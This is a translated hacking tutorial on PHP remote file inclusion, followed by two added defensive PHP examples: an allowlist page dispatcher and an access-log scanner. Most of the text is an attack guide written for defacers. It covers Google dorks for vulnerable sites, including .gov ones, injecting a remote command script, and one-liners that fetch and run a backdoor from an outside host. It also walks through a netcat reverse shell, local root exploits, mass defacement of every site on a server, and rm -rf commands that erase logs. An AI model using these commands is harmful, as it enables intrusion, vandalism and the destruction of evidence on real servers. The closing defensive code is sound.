Complete PHP injection tutorial for beginners

Tutorial developed for the naughty ones

1) Introduction

Since a lot of people ask for help with PHP injection, I decided to write an easy-to-understand tutorial to make life easier for the newcomers. The flaw consists of a user including scripts in the PHP code of the site in question, the victim, and having them executed. When it is used correctly, which is what I will explain in this tutorial, the intruder is able to send commands to the server. A good part of the process can be done from the browser itself (IE, Mozilla, Netscape...). I will try to explain how to find, exploit and fix the bug. I hope it is useful for everybody ;)

Obs1.: This tutorial was made to explain one of the ways people use to deface sites, but it can be used for other ends. That is up to each one :P
Obs2.: At the end there are URLs for the programs cited.

2) What is what

Victim: The site whose PHP flaw you are going to exploit.
String: Files on the site that are susceptible to the attack.
Cmd: A PHP script that makes it possible to type commands, which are then included in the PHP.
Backdoor: Opens ports on the system for remote connection 'without verification'.
Connect Back: Opens a specific port for connections between your PC and the target.
Exploit: A program that exploits a certain flaw in a system. There are several types of exploits. Here we will deal only with local root exploits (they exploit local flaws that take common users to root, the super-user, access).
Shell: A command interpreter that allows the user to interact with the operating system through typed commands.
Telnet: We will use it for remote connections.
Firewall: An intelligent barrier between a local network and the Internet, through which only authorized traffic passes. This traffic is examined by the firewall in real time and the selection is made according to the rule
"what is not expressly allowed is forbidden".
root: Super-user. The admin... has total access to the system.

-------------------
In the browser

3) Strings

There are several strings available. In this tutorial I will use a simple one for the examples, "index.php?page=". Several others are in the annex at the end :P

4) Syntax

Ex: www.site.com /index.php?page= http://CMD/cmd.gif?&cmd= ls
    ^            ^                ^                        ^
    Target       String           Cmd                      Unix command

P.S.: Without the spaces.

5) Looking for a vulnerable site

An excellent tool for kiddies, without a doubt, is Google. There are several ways to search with it, among them:

Obs.: The word "word" that I cite here is whatever you are looking for in the search engine.

word: Searches for sites that contain "word" anywhere on the page.
allinurl: Sites that contain the cited word in the URL. Ex: www.site.com/forum/word.php?id=0
allintitle: Restricts the search to the title of the page.
intitle: Similar to the one above; for more clarification see the end of the tutorial.
inanchor: Searches in the links inside the body of the sites.
site: Searches sites of a given domain. Ex: site:br <- searching sites with .br
link: Sites that contain links to another given site. Ex: link:www.securityfocus.com
filetype: Filters by file extension. Ex: filetype:php <- searching URLs with .php

These tips should not only be used to search for vulnerable sites, but also in your everyday searches ;)

Using the string "index.php?page=" for .gov sites --> allinurl:index.php?page= site:gov

Easy.

You can also use a scanner to make the process more efficient. kieger (member of the r00t_System grouP) coded one in Perl: it searches with Google, tests, and prints the vulnerable ones to a file. Code at the end of the tutorial.

6) Using the Cmd

6.1) Including

Cmd = http://xpl.netmisphere2.com/0000-CMDS/cse.gif?&cmd=id

In the search result, insert the cmd into the string.
Ex: www.site.com/index.php?page=http://xpl.netmisphere2.com/0000-CMDS/cse.gif?&cmd=id

There is no mystery to it.

6.2) The Cmd

datacha0s - PHP Command/Safemode Exploit

System Information
sysname: --> Operating system running.
nodename: --> Local name.
release: --> Kernel version.
Script Current User: --> User the script is being executed as.
PHP Version: --> PHP version on the machine.
User Info: --> User information (uid, euid, gid).
Current Path: --> Current folder you are in on the server.
Server IP: --> IP of the server.
Web server: --> Information about the server.

[*] Command Mode
Run Command
Stdout ((the results of the commands inserted in cmd will appear here))

Obs.: The script varies from cmd to cmd. This is only one example.

7) Gaining access to the shell

For the next steps you need to be in the shell (command interpreter) of the machine. I will explain two ways to make this possible: Backdoor and Connect Back.

7.1) Running a backdoor on the server for remote connection

To run a backdoor, it is enough to upload it, set the permissions, and execute it. Command:

    cd /var/tmp;wget www.site.onde.está.o.backdoor.com/backdoor;chmod 777 backdoor;./backdoor

cd /var/tmp -> Does the operation in this folder, because it is common to all users and because of its permissions. /tmp also works :)
wget www. (...) /backdoor -> Copies the backdoor from a URL to the site. When wget does not work, try other commands. Syntaxes:

    wget www.site.com/file
    lynx -source www.site.com/file > file
    curl -o www.site.com/file
    GET www.site.com/file > file
    (...)
With wget, type --->
    cd /tmp;wget http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin
When the shell only accepts GET, type --->
    cd /tmp;GET http://xpl.netmisphere2.com/r0nin > r0nin;chmod 777 r0nin;./r0nin
When it accepts lynx -source, type --->
    cd /tmp;lynx -source http://xpl.netmisphere2.com/r0nin > r0nin;chmod 777 r0nin;./r0nin
When it accepts curl -o, type --->
    cd /tmp;curl -o bird http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin
And when the kernel of the shell is FreeBSD, type --->
    cd /tmp;fetch http://xpl.netmisphere2.com/r0nin;chmod 777 r0nin;./r0nin

After doing this, the following message will appear:

    PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 14274
    Shell on: 9997
    User: wwwrun UID: 30
    Name: /sbin/syslogd (Masked in PS! )
    v: = Linux s106 2.6.5-7.151-default
    Rootab !! use: expand_stack, Krad(if 2004) !
    PORT = 9997

This means that the backdoor is running. Now it is enough to connect to the shell. How? In Windows: Start -> Run -> telnet www.site.com port

Here www.site.com is the name or IP of the site where you ran the backdoor, and port is the port the backdoor is working on. If bash-2.05b$ or something similar appears in telnet, it is because it worked! And you have shell access on the machine! If it takes a while and does not drop into a shell, check the name/IP of the server. If it is correct, a firewall is running. And now? Simple, Connect Back. :P

7.2) Connect Back

A very efficient method to gain a shell on a machine. It gains the shell in reverse.
Windows: Download netcat for Windows and, in the MS-DOS prompt (in the folder where nc is located), type: nc -vv -l -p 15, where 15 can be chosen according to your preference. This port will be the one that carries the connection.

Now, going back to the browser, type the following command in the cmd:

    cd /var/tmp;wget www.site.do.dc.com/dc;chmod 777 dc;./dc IP port

cd /var/tmp -> Same as for the backdoor.
wget www.site.do.dc.com/dc -> Same as above but, logically, with the address of dc.
./dc IP port -> where IP is YOUR IP and port is the port that you chose in netcat.

Once this is done, if everything goes right, the result will be:

    Connect Back Backdoor
    [*] Dumping Arguments
    [*] Resolving Host Name
    [*] Connecting…
    [*] Spawning Shell
    [*] Detached

This means that you are connected to the shell! ;) Now go to the MS-DOS window and on to the next step.

If this appears instead:

    Connect Back Backdoor
    [*] Dumping Arguments
    [*] Resolving Host Name
    [*] Connecting…
    [-] Unable to Connect

check the data (your IP, port, netcat, etc). If it persists, the network does not accept this type of connection. Try other ports (such as 80, 22, 15, etc).

----------------------------------
In the Shell

8) Basic commands

I was going to skip this part, but I know that many people do not know the Unix commands. So let us get to know some:

ls -> Lists files. It can be combined with -a (shows hidden files) and -l (shows details). Ex: ls -la (shows the files, including hidden ones, in detail).
uname -> Shows information about the system, such as kernel version, name, and other useful things.
id -> Shows your id.
w -> Lists the users logged in at the moment.
cp -> Copies files. Syntax: cp /destination/ file
mv -> Moves files. Syntax: mv /destination/ file
rm -> Removes files. If combined with -rf, removes all the specified files, including folders
mkdir -> Creates a directory
rmdir -> Deletes a directory
find -> Searches for files/folders.
Ex: "find /etc -name httpd.conf" looks for httpd.conf in the /etc folder
pwd -> Shows which folder you are in
cat -> Shows the content of a file on the screen
head -> Shows lines from the beginning of the file
tail -> Shows the end of the file
ctrl+c -> Exits/kills a program
ctrl+r -> Searches for a typed command in the bash history
ps -auxw -> Lists all the processes of the system
netstat -in -> Status of the connection
kill -9 -> Kills a process. Syntax: kill -9 PID OF THE PROCESS
kill -HUP -> Restarts a process. Syntax: kill -HUP ID OF THE PROCESS
pico -> Text editor. Syntax: pico file
vi -> Text editor. Syntax: vi file

Saving results to a file

    command > /file/where/it/will/be/stored

Ex: ls /etc > /tmp/s.txt saves the whole result of the listing of /etc in the file /tmp/s.txt

Adding lines to files

    echo "line" >> /file/where/it/will/be/included

Unpacking files (most common)

    .tar     -> tar xvf files.tar
    .tar.gz  -> tar zxvf files.tar.gz
    .tar.bz2 -> tar jxvf files.tar.bz2
    .zip     -> unzip files.zip

Compressing files (most common)

    .tar     -> tar cvf destination.tar FILE
    .tar.gz  -> tar cvf destination.tar FILE && gzip destination.tar
    .tar.bz2 -> tar cvf destination.tar FILE && bzip2 destination.tar
    .zip     -> zip destination.zip FILE

Good. Look for a Linux tutorial for more clarification :P

9) Gaining root access

Gaining local root access on a machine depends on a lot. You need a local exploit and the system must be vulnerable. Simple: it is enough to download it, set the permissions and execute it, just as you do with the backdoor, but you do this in the shell. The most common at the moment are mremap, brk and kmod, for kernels below 2.4.24.

If everything goes right when rooting the machine, typing the command "id" will show:

    bash-2.05b# id
    uid=0 (root) gid=0 (root)

Done! You are root!
Have fun ;)

--------------------------------
Fixing the bug

10) Correction

A very simple way to fix the PHP bug is to edit the php.ini file in the configuration folder of your Apache and disable the functions system, exec, passthru, shell_exec (...)

And, of course, always pay attention to security news and keep yourself up to date :)))

--------------------------------
Fun for kiddies

Well, after having root on the machine, you can do whatever you want :P It depends on the creativity and need of the person. For kiddies whose goal is to deface sites, let us understand how this works. Or rather, I will try to explain how a mass defacement is done.

11) List of the sites hosted on the server

Well, for defacement this part is essential: knowing which sites are there. But how?

11.1) httpd.conf

Generally the data of the hosted sites is in this file. To list the sites, it is enough to type a command that reads httpd.conf and prints the lines that contain ServerName (the names of the sites).

(in the folder where httpd.conf is located)

    cat httpd.conf | grep ServerName

(they will be in this same file; you can save the result to a file, preferably in the folder of the site you came in through, and download it)

    cat /etc/httpd/conf/httpd.conf | grep ServerName

----> How? Well, in the CMD, type pwd. You will see where you are on the server. Ex: /home/httpd/vhosts/nasa.gov/web/ Let us say that the URL is this: http://nasa.gov/index.php?page=CMD Then, if you send the result to /home/httpd/vhosts/nasa.gov/web, this file will be in the root of the site. Just type this command:

    cat httpd.conf | grep ServerName > /home/httpd/vhosts/nasa.gov/web/RESULTADO.txt

(only an example) Once this is done, go to http://nasa.gov/RESULTADO.txt and download the list :P <----

Now, where is this file?
GENERALLY in the /etc/httpd/conf or /etc/apache/conf folders, but this varies a lot and it can be found in other places. An efficient, though slow, way to find it is to do a complete search of the system. Command:

    find / -name httpd.conf

This prints where httpd.conf is on the server. More than one result may appear; go on testing :P That is all.

11.2) Other ways…

If even so you cannot find which sites are there, look for alternative ways. Unfortunately there is no way to explain this, because each server does it differently. Example: if you are in the folder where the sites are located, the folders will already have their names and domains:

Ex: ls /home/httpd/vhosts
    site.com
    mtv.com.br
    nasa.gov
    whitehouse.gov
    fuckbush.org
    … etc

Other times they are found in a file called confixxx_alguma_coisa… There is no magic. Search the server…

12) Making the mass defacement

Well, first create the index that you want to put in place of the others. Once that is done, put it somewhere from which you can upload it to the server. There are free places that can be used, such as 100free.com. Create an account and put the index there. If you want to rename it to .zip so that it stays without advertising, you can do that too :P

Now, the end: changing all the others for yours. Simple, one command is enough for this:

    find /folder/where/are/the/sites -name “index.*” -exec cp /where/is/its/index.html {} \;

To know where the sites are, just run pwd in the cmd. Ex: /home/httpd/vhosts/nasa.gov/web You can see that all the others are in /home/httpd/vhosts. Upload it the same way as the backdoor.
    wget http://its-index.com/its.index

Let us say that you put it in the /tmp folder; then the command would be like this:

    find /home/httpd/vhosts -name “index.*” -exec cp /tmp/index.html {} \;

Now just wait a little and all the sites will be defaced :P

Posts:
www.Zone-H.org
www.coredumped.org
www.delta5.com.br

13) Erasing logs

Some useful commands to erase logs:

    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /var/apache/log
    rm -rf $HISTFILE
    find / -name .bash_history -exec rm -rf {} \;
    find / -name .bash_logout -exec rm -rf {} \;
    find / -name log* -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;

--------------------------------
The End

Done, I think that is all. Any error, just tell me so that I can correct it :D

Greetz to everyone on IRC
irc.undernet.org -j #Shellfull
irc.fullnetwork.org -j #Owned
irc.Gigachat.net -j #Owned

--------------------------------
Common strings
#### XMLRPC - BUGS #####
by phpmyfaq / powered by phpwebsite / powered by postnuke / includedby phpMyFAQ / powered+by+phpMyFAQ
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
phpAdsNew (adxmlrpc.php)
phpwebsite (rpc.php)
php-wiki (utils.php)
Wordpress (xmlrpc.php)
index.php?gadget= (blogxmlrpc.php)

####################################################
CGI and .pl files that allow defacement, such as awstats, ikonboard, etc.
Collected by unknown - unknown_br@linuxmail.org

===========================================================
Translated by sintink with Google translate tools (http://translate.google.com) and Free Translation tools (http://www.freetranslation.com)
mail :
sintink@gmail.com
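
The correction in section 10, carried further in an added PHP example that is not part of the original tutorial: disabling system, exec, passthru and shell_exec limits what an included script can run but does not stop the inclusion itself, so the code below also checks allow_url_include and maps the "page" parameter through an allowlist. PAGE_DIR, PAGES, resolve_page() and config_findings() are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example: not part of the original tutorial.
// PAGE_DIR, PAGES, resolve_page() and config_findings() are hypothetical names.

// The pattern the tutorial abuses passes the request parameter straight to
// include, so "index.php?page=http://..." pulls in and runs remote code:
//     include $_GET['page'];

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist of page keys. The client chooses a key, never a path or a URL.
const PAGES = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/** Map the untrusted "page" value to a local file, or null if not allowed. */
function resolve_page($requested): ?string
{
    // "?page[]=x" arrives as an array; only exact string keys are accepted.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$requested];
}

/** Report php.ini settings that matter for this bug class. */
function config_findings(): array
{
    $findings = [];
    // allow_url_include lets include/require fetch http:// and ftp:// URLs.
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include is On: set it to Off';
    }
    // Section 10 of the tutorial: command-execution functions to disable.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['system', 'exec', 'passthru', 'shell_exec'] as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "$fn is not listed in disable_functions";
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: one valid key, then the shapes an attacker sends.
    $samples = ['news', 'http://attacker.example/cmd.gif?&cmd=id',
                '../../etc/passwd', 'news.php', ['news']];
    foreach ($samples as $s) {
        printf("%-45s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
               resolve_page($s) ?? 'REJECTED');
    }
    foreach (config_findings() as $f) {
        echo "config: $f\n";
    }
} else {
    // Web request: unknown keys get a 404 and nothing is included.
    $file = resolve_page($_GET['page'] ?? 'home');
    if ($file === null) {
        http_response_code(404);
        exit('Page not found');
    }
    include $file;
}
```

Run from the command line it prints the verdict for each sample and the configuration findings; served by a web server it acts as the page dispatcher.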
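
The request shape from sections 4 and 6.1, a query parameter whose value is itself a URL, stands out in web server logs. This added PHP example, not from the original tutorial, scans combined-format access log lines for it; the log lines, addresses, host names and function names are constructed for illustration.

```php
<?php
// Added example: not part of the original tutorial. All log lines are constructed.

// Values that start with a remote URL scheme or a PHP stream wrapper.
const REMOTE_VALUE = '~^\s*(?:https?://|ftps?://|php://|expect://|data:)~i';

/** Names of query parameters in a request target whose value is a URL. */
function remote_include_params(string $target): array
{
    $pos = strpos($target, '?');
    if ($pos === false) {
        return [];
    }
    // parse_str URL-decodes, so page=http%3A%2F%2F... is caught as well.
    parse_str(substr($target, $pos + 1), $params);
    $hits = [];
    $walk = function ($value, string $name) use (&$walk, &$hits): void {
        if (is_array($value)) {              // e.g. config[path]=http://...
            foreach ($value as $key => $inner) {
                $walk($inner, $name . '[' . $key . ']');
            }
        } elseif (preg_match(REMOTE_VALUE, (string) $value)) {
            $hits[] = $name;
        }
    };
    foreach ($params as $name => $value) {
        $walk($value, (string) $name);
    }
    return $hits;
}

/** Scan combined-format log lines; return one finding per suspicious request. */
function scan_access_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match('~^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})~', $line, $m)) {
            continue;
        }
        $params = remote_include_params($m[2]);
        if ($params !== []) {
            $findings[] = ['client' => $m[1], 'status' => (int) $m[3],
                           'params' => $params, 'target' => $m[2]];
        }
    }
    return $findings;
}

// Constructed sample: a normal request, the tutorial's request shape, an
// encoded array-parameter variant, and a legitimate redirect parameter.
$log = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://attacker.example/cmd.gif?&cmd=id HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /src/main.inc.php?config[path]=http%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 404 310 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /login.php?next=https://www.example.org/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

foreach (scan_access_log($log) as $f) {
    // A 200 on a script that includes the parameter deserves a look first;
    // redirect-style parameters such as "next" also match and need triage.
    printf("%s status=%d params=%s %s\n", $f['client'], $f['status'],
           implode(',', $f['params']), $f['target']);
}
```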